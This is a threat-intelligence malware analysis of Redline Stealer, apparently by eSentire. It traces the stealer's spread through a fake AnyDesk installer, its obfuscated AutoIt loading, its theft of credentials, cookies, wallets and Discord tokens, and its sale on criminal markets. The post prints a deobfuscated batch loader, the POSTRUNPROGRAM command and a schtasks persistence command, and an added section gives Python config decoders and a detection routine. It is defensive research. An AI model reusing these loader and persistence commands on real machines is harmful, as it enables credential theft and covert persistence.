
eSentire Threat Intelligence Malware Analysis: Redline Stealer

BY eSentire Threat Response Unit (TRU)

December 8, 2022 | 18 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin


Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via a web UI; everything can be managed from the Redline client on the attacker’s virtual private server (VPS). The stealer offers multiple capabilities, including obfuscation, and its management interface makes it easy for attacker(s) to operate.

This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer.
  • Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary.
  • Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.
  • Redline uses Windows Communication Foundation (WCF) with NetTCPBinding for C2 communication.
  • Redline Stealer does not exfiltrate logs from Commonwealth of Independent States (CIS) countries.

Case Study

eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed via fake software impersonating AnyDesk. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).

Figure 1: Fake AnyDesk webpage


Figure 2: Legitimate AnyDesk webpage


The fake AnyDesk installer comes in an ISO image file and is 312MB in size. Padding the binary with junk hex bytes to inflate the file size is a common stealer practice, since some sandboxes and antivirus engines have file size limits. The infection chain is shown in Figure 3.

Figure 3: Redline infection chain via fake software


The AnyDesk binary embeds a cabinet file in its RCData resource (Figure 5). The extracted cabinet file contains the following (Figure 4):

Figure 4: Contents of the cabinet file


Figure 5: Cabinet file embedded within the binary


The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings localhost five times, which acts as a roughly 5-second sleep so the obfuscated file can run successfully.

The deobfuscated Saputo.potm file is shown below:

tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL
if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe
<nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS
MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS
ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t
pEoQCZpLBzfzlhEvxHCjS t
ping localhost -n 5

The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.

imagine.potm contains the obfuscated AutoIt script in which Redline Stealer resides. The Redline binary embedded within the obfuscated AutoIt script is shown in Figure 6.

Figure 6: Embedded Redline stealer within an obfuscated AutoIt script


The RC4 key used to decode the script is built from concatenated decimal values, each subtracted by 2, as shown below (snippet of the obfuscated AutoIt script):

$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
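As an added example (not code from the original post), the helper below rebuilds the RC4 key from the snippet above and then applies RC4 to a constructed blob. It assumes the obfuscator's helper splits the string on "[" and maps each decimal value minus 2 to its ASCII character; the function names are hypothetical.

```python
def autoit_key(encoded: str, offset: int = 2, sep: str = "[") -> str:
    """Rebuild the RC4 key: split the '['-delimited decimal list, subtract the
    offset from each value and map the result to its ASCII character.
    (Assumed behaviour of the obfuscator's helper; hypothetical function name.)"""
    chars = []
    for token in encoded.split(sep):
        token = token.strip()
        if not token.isdigit():
            raise ValueError(f"unexpected token {token!r} in encoded key")
        chars.append(chr(int(token) - offset))
    return "".join(chars)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Encoded value and offset taken from the obfuscated AutoIt snippet quoted above.
ENCODED_KEY = "59[53[51[58[53[53[56[53[58[59"


def decode_payload(blob: bytes, encoded_key: str = ENCODED_KEY) -> bytes:
    """Derive the key and RC4-decrypt a payload blob extracted from the script."""
    return rc4(autoit_key(encoded_key).encode(), blob)


if __name__ == "__main__":
    key = autoit_key(ENCODED_KEY)
    # Constructed sample blob (not the real embedded payload): RC4 is symmetric,
    # so encrypting with the derived key yields data that decode_payload undoes.
    sample = rc4(key.encode(), b"MZ\x90\x00 constructed sample")
    print(key, decode_payload(sample))
```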

The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.

After the execution of the binary, the files mentioned in Figure 4 will be extracted from the CAB file into IXPxxx.TMP folder under the %TEMP% path as shown in Figure 7. The renamed NTDLL.DLL file is also dropped to the folder. This is a known technique used by threat actor(s) to bypass EDR detections – loading the copy of NTDLL.DLL during the runtime. We have briefly described this technique in our Mars Stealer analysis.

Figure 7: Debugging AnyDesk.exe file


An additional folder is created to run a scheduled task from; this persistence technique ensures that the infected host periodically communicates with the C2.

The scheduled task creation command line (the scheduled task is named Puoi and is set to run the z file under folder %TEMP%\zqNDtAgMrV, which is the obfuscated AutoIt script containing the stealer, every 3 minutes):

schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F
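As an added detection example (not code from the original post), the triage logic below runs over constructed process-creation events and flags scheduled task creation with the traits seen in this persistence command: an action running from the user's Temp folder, a double .exe.com extension, and a minute-level trigger. The event format and function names are assumptions.

```python
import re

# Constructed sample process-creation events (not from the original post);
# the first mirrors the schtasks command line quoted in the analysis.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ping -n 5 localhost"},
]


def task_action(cmdline: str):
    """Return the /tr value (quoted or bare) of a schtasks command line, or None."""
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def assess_event(event: dict) -> list:
    """Return the list of suspicious traits found in a schtasks /create event."""
    reasons = []
    cmd = event["cmdline"]
    if "schtasks" not in event["image"].lower() or not re.search(r"/create\b", cmd, re.IGNORECASE):
        return reasons
    action = task_action(cmd) or ""
    # Persistence from a writable, user-controlled temp location
    if re.search(r"\\AppData\\Local\\Temp\\", action, re.IGNORECASE):
        reasons.append("task action runs from the user Temp folder")
    # Double extension on the task action, as on the renamed AutoIt binary here
    if re.search(r"\.exe\.com(\s|$)", action, re.IGNORECASE):
        reasons.append("task action uses a double extension (.exe.com)")
    # Very frequent beaconing-style trigger (every N minutes, N small)
    m = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cmd, re.IGNORECASE)
    if m and int(m.group(1)) <= 5:
        reasons.append(f"high-frequency trigger: every {m.group(1)} minute(s)")
    return reasons


def triage(events: list) -> list:
    """Return (command line, reasons) for every event with at least one trait."""
    hits = []
    for event in events:
        reasons = assess_event(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```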

The deobfuscated binary contains Redline Stealer, which is injected into the jsc.exe process after being decrypted by a renamed AutoIt process, as shown in Figure 8.

Figure 8: The stealer is injected into jsc.exe


The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).

Figure 9: Redline performs enumeration on the host


We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).

Figure 10: Redline collecting credit card information from Chrome

Redline Stealer Behind The Scenes

Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline is allegedly written based on feedback from people involved in carding, the term describing an unauthorized usage of credit cards.

Similar to Raccoon Stealer, Redline requires a dedicated VPS (Virtual Private Server) to host the panel. The stealer can be easily bought via a Telegram bot (Figure 12) using cryptocurrency as a payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the Telegram group. Based on a review of the chats, Russian native speakers were the most active. After the subscription expires, the user is removed from the private chat.

Figure 11: First appearance of Redline Stealer on hacking forums (translated from Russian)


Figure 12: Redline Telegram Bot

Redline Stealer capabilities include:

What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).

Figure 13: Redline installation manual


It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.

The Redline panel (Figure 14) is easy to navigate through and contains the following sections:

Figure 14: Redline Statistic Panel (source: Telegram)


Figure 15: Advertisement panel


Figure 16: Loader Tasks panel


Figure 17: Log Sorter panel


Figure 18: Builder panel


Figure 19: Telegram Logs Configurator


Figure 20: Black Lists panel


Figure 21: Settings panel


Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.

Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).

Figure 22: Advertisement on buying Facebook logs


Figure 23: Facebook logs buy requests on hacking forums


There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).

Figure 24: Telegram Bot that buys the stolen logs (currency is shown in rubles)


Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).

Figure 25: Redline logs for sale on RussianMarket


It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.

Figure 26: The guide written by a Russian native speaker on how to distribute stealers (translated from Russian)


The installers push the stealer to third-party advertising networks or platforms. The advertising service will display the ads on different webpages based on the countries that the attacker(s) specify (Figure 27).

Figure 27: The bot that pushes the stealers via advertising platforms

More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of the crypters, named Spectrcrypt or Spectrum Crypt, which comes for free with a one-month subscription purchase (Figure 28).

Figure 28: Spectrum Crypt promoted by Redline


The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).

Figure 29: Redline logs for sale (1)


Figure 30: Redline logs for sale (2)

Redline Technical Analysis

The non-obfuscated Redline payload is a 32-bit .NET binary, 107 KB in size. The hash of the payload and the original filename change each time a build/payload is generated from the Redline panel.

The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).

Figure 31: Redline payload configuration


The encoded strings are base64-encoded, XOR-ed with the hardcoded key “Raves”, and then base64-encoded again (Figure 32).

Figure 32: String encoding algorithm with simple XOR key and base64
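As an added example (not code from the original post), the decoder below reverses the scheme just described: base64-decode, XOR with the key, base64-decode again. It assumes a repeating-key (cyclic) XOR; the sample configuration values are constructed here and are not indicators from the analysis, and the function names are hypothetical.

```python
import base64


def xor_cyclic(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def redline_decode(encoded: str, key: str = "Raves") -> str:
    """Reverse the observed scheme: base64 -> XOR with key -> base64."""
    layer1 = base64.b64decode(encoded)
    layer2 = xor_cyclic(layer1, key.encode())
    return base64.b64decode(layer2).decode("utf-8", errors="replace")


def redline_encode(plain: str, key: str = "Raves") -> str:
    """Forward direction of the same scheme; used here only to build sample input."""
    layer1 = base64.b64encode(plain.encode())
    layer2 = xor_cyclic(layer1, key.encode())
    return base64.b64encode(layer2).decode()


def decode_config(fields: dict, key: str = "Raves") -> dict:
    """Decode every field of an Argument-style configuration dictionary."""
    return {name: redline_decode(value, key) for name, value in fields.items()}


# Constructed sample only (TEST-NET address, placeholder build ID/version);
# these are not indicators from the original analysis.
SAMPLE_CONFIG = {
    "IP": redline_encode("198.51.100.10:4138"),
    "ID": redline_encode("build-placeholder"),
    "Version": redline_encode("0.0-sample"),
}


if __name__ == "__main__":
    for name, value in decode_config(SAMPLE_CONFIG).items():
        print(f"{name}: {value}")
```

When a sample uses a different key, pass it explicitly; the key is stored alongside the encoded fields in the Argument class, as described above.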


Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).

The crypto wallet extensions are decoded from a Base64-encoded blob and listed as extension ID and wallet name pairs.


Figure 33: Browser folders and crypto wallet extension enumeration


Entity15 is likely used for performing the loader tasks (Figure 34).

Figure 34: Updating the loader tasks


The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).

Figure 35: ConfigReader class


ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).

Figure 36: C2 communication via WCF


Figure 37 shows an example of C2 traffic generated by a workstation infected with Redline; it contains the stealer configuration, C2 IP, host information and files residing on the host. Note that tempuri[.]org is the default WCF namespace and should not be treated as the sole indicator of a Redline compromise.

Figure 37: Example of the traffic generated from the infected machine


Entity5 gathers Discord tokens under \AppData\Roaming\discord\Local Storage\leveldb path from .log and .db files (Figure 38). Redline harvests the Discord tokens because they can bypass Two Factor Authentication (2FA) and allow users to access their accounts without providing credentials. All that is needed is the link. For detection evasion purposes, Redline adds random words into the strings and then replaces them.

Figure 38: Discord token stealer module


Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).

Figure 39: DownloadAndEx and Download loader tasks


Entity8, Entity10, Entity11 and Entity12 within the EntityCreator class scan for autofills, cookies, credentials, and credit cards respectively (Figure 40). The credentials are then decrypted in the EntityReader class.

Figure 40: Cookie, credit card, credential, and autofill scanner module


Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).

Figure 41: Default user interface language


PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).

Figure 42: PartsSender class containing each log that needs to be sent to an attacker


The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).

Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).

Figure 43: SystemInfoHelper class


Figure 44: Logs received from the compromised machine


Figure 45: Redline User Information logs

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:

As the TTPs used by threat actor(s) grow in sophistication, they create difficulties that force critical business decisions. Preventing the various attack techniques and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs and network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.


Appendix

eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
